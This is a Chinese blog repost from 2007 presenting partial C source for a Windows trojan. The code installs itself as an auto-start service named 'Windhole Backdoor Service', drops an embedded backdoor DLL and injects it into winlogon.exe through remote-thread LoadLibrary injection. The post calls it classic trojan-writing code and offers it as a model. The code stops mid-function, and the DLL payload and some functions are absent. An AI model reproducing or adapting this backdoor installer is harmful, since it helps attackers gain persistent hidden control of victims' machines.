ITPub博客

首页 > 应用开发 > IT综合 > 写木马的经典,dll插入系统进程的源码(转)

写木马的经典,dll插入系统进程的源码(转)

原创 IT综合 作者:RegisterForBlog 时间:2007-09-19 18:36:25 0 删除 编辑
写木马的经典,dll插入系统进程的源码(转)[@more@]

  代码不全,这是涉及主要的部分!有详细的注释

  里面有涉及普通常用且又重要的编程思路!

  /*---------------------------------------------------------------------

  //mysvr.c

  //Coder: sjdf

  //E-mail: sjdf1@163.com

  //Create date: 2002.8.11

  //Last modify date: 2003.10.28

  //Test platform: Win2000 Adv Server + sp4

  ---------------------------------------------------------------------*/

  //Header

  #include "bkdlldata.h"

  #include

  #include

  #include

  #include

  #include

  //---------------------------------------------------------------------

  //Global constant

  char SERVICENAME[9] = "windhole";

  const char DISPLAYNAME[33] = "Windhole Backdoor Service";

  const char SRVFILENAME[13] = "windhole.exe";

  const char BDRFILENAME[13] = "backdoor.dll";

  const char DESTPROC[19] = "winlogon.exe";

  //---------------------------------------------------------------------

  //Glabal variable

  SERVICE_STATUS MyServiceStatus;

  SERVICE_STATUS_HANDLE MyServiceStatusHandle;

  int WillStop = 0;

  //---------------------------------------------------------------------

  //Function declaration

  int AddPrivilege(const char *Name);

  void MyServiceStart (int argc, char *argv[]);

  void MyServiceCtrlHandler (DWORD opcode);

  DWORD MyWrokThread(void);

  DWORD ProcessToPID(const char *InputProcessName);

  //---------------------------------------------------------------------

  //Function definition

  int main(int argc,char *argv[])

  {

  //如果参数为“-service”就作为服务启动

  if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))

  {

  SERVICE_TABLE_ENTRY DispatchTable[] =

  {

  {SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},

  {NULL, NULL}

  };

  if (!StartServiceCtrlDispatcher( DispatchTable))

  {

  return 1;

  }

  return 0;

  }

  //否则就自动安装服务

  //复制自身到系统目录

  char DestName[MAX_PATH + 1];

  char NowName[MAX_PATH + 1];

  ZeroMemory(DestName,MAX_PATH + 1);

  ZeroMemory(NowName,MAX_PATH + 1);

  if (!GetSystemDirectory(DestName,MAX_PATH))

  {

  printf("GetSystemDirectory() error = %d Install failure! ",GetLastError());

  return 1;

  }

  lstrcat(DestName,"");

  lstrcat(DestName,SRVFILENAME);

  if (!GetModuleFileName(NULL,NowName,MAX_PATH))

  {

  printf("GetModuleFileName() error = %d Install failure! ",GetLastError());

  return 1;

  }

  if (!CopyFile(NowName,DestName,0))

  {

  printf("CopyFile() error = %d Install failure! ",GetLastError());

  return 1;

  }

  //安装服务

  SC_HANDLE newService, scm;

  //连接SCM

  if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))

  {

  printf("OpenSCManager() error = %d Install failure! ",GetLastError());

  return 1;

  }

  //当作为服务启动时加上“-service”参数

  lstrcat(DestName," -service");

  if (!(newService = CreateService(scm,

  SERVICENAME,

  DISPLAYNAME,

  SERVICE_ALL_ACCESS,

  SERVICE_WIN32_OWN_PROCESS,

  SERVICE_AUTO_START,

  SERVICE_ERROR_NORMAL,

  DestName,

  NULL, NULL, NULL, NULL, NULL)))

  {

  printf("CreateService() error = %d Install failure! ",GetLastError());

  }

  else

  {

  printf("Install success! ");

  char *pra[] = {"-service", ""};

  if (!StartService(newService,1,(const char **)pra))

  {

  printf("StartService() error = %d Start service failure! ",GetLastError());

  }

  else

  {

  printf("Start service Success! ");

  }

  }

  CloseServiceHandle(newService);

  CloseServiceHandle(scm);

  return 0;

  }

  //---------------------------------------------------------------------

  DWORD MyWorkThread(void)

  {

  Sleep(4000);

  FILE *fp;

  if ((fp = fopen(BDRFILENAME,"wb")) == NULL)

  {

  WillStop = 1;

  return 1;

  }

  fwrite(data1,sizeof(data1),1,fp);

  fwrite(data2,sizeof(data2),1,fp);

  fwrite(data3,sizeof(data3),1,fp);

  fwrite(data4,sizeof(data4),1,fp);

  fwrite(data5,sizeof(data5),1,fp);

  fclose(fp);

  char FullName[MAX_PATH + 1];

  ZeroMemory(FullName,MAX_PATH + 1);

  GetSystemDirectory(FullName,MAX_PATH);

  lstrcat(FullName,"");

  lstrcat(FullName,BDRFILENAME);

  //如果是要打开系统进程,一定要先申请debug权限

  AddPrivilege(SE_DEBUG_NAME);

  HANDLE hRemoteProcess = NULL;

  DWORD Pid = ProcessToPID(DESTPROC);

  if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许远程创建线程

  PROCESS_VM_OPERATION | //允许远程VM操作

  PROCESS_VM_WRITE | //允许远程VM写

  PROCESS_VM_READ, //允许远程VM读

  0,

  Pid)) == NULL)

  {

  WillStop = 1;

  return 1;

  }

  char *pDllName = NULL;

  if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,

  NULL,

  lstrlen(FullName) + 1,

  MEM_COMMIT,

  PAGE_READWRITE)) == NULL)

  {

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 1;

  }

  //使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间

  if (WriteProcessMemory(hRemoteProcess,

  pDllName,

  FullName,

  lstrlen(FullName),

  NULL) == 0)

  {

  VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 1;

  }

  //计算LoadLibraryA的入口地址

  PTHREAD_START_ROUTINE pfnStartAddr = NULL;

  if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(

  GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)

  {

  VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 1;

  }

  DWORD ThreadId = 0;

  CreateRemoteThread(hRemoteProcess, //被嵌入的远程进程

  NULL,

  0,

  pfnStartAddr, //LoadLibraryA的入口地址

  pDllName,

  0,

  &ThreadId);

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 0;

  }

  //---------------------------------------------------------------------

  void MyServiceStart (int argc, char *argv[])

  {

  if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))

  {

  return;

  }

  MyServiceStatus.dwServiceType = SERVICE_WIN32;

  MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;

  MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;

  MyServiceStatus.dwWin32ExitCode = 0;

  MyServiceStatus.dwServiceSpecificExitCode = 0;

  MyServiceStatus.dwCheckPoint = 0;

  MyServiceStatus.dwWaitHint = 0;

  if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))

  {

  return;

  }

  DWORD Threadid;

  // Initialization code goes here. Handle error condition

  if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))

  {

  MyServiceStatus.dwCurrentState = SERVICE_STOPPED;

  MyServiceStatus.dwCheckPoint = 0;

  MyServiceStatus.dwWaitHint = 0;

  MyServiceStatus.dwWin32ExitCode = GetLastError();

  MyServiceStatus.dwServiceSpecificExitCode = GetLastError();

  

本文来自:http://www.linuxpk.com/30590.html

-->linux电子图书免费下载和技术讨论基地

·上一篇:让数据库更安全,Mysql自动备份脚本

·下一篇:VisualC#.Net网络程序开发-Socket篇
 
     最新更新
·注册表备份和恢复

·低级格式化的主要作用

·如何防范恶意网站

·常见文件扩展名和它们的说明

·专家:警惕骇客骗局,严守企业信息

·PGPforWindows介紹基本设定(2)

·解剖安全帐号管理器(SAM)结构

·“恶作剧之王”揭秘

·绿色警戒

·黑客反击战

·网络四大攻击方法及安全现状描述

·可攻击3种浏览器代码流于互联网

·黑客最新的兴趣点,下个目标会是谁?

·“僵尸”——垃圾邮件的主要传播源

·Lebreat蠕虫惊现3变种

·POSTFIX反病毒反垃圾Ų…

·在FreeBSD上用PHP实现在线添加FTP用户

·简单让你在FreeBSDADSL上…

·安全版本:OpenBSD入门技巧解析

·Internet连接共享上网完全攻略

·关于ADSL上网网速常识

·静态缓存和动态缓存的比较

·最友好的SQL注入防御方法

·令网站提速的7大秘方

·网络基础知识大全

·路由基本知识

·端口映射的几种实现方法

·VLAN经典诠释

·问题分析与解决——ADSL错误代码

·问题分析——关于2条E1的线路绑定


关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-970138/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论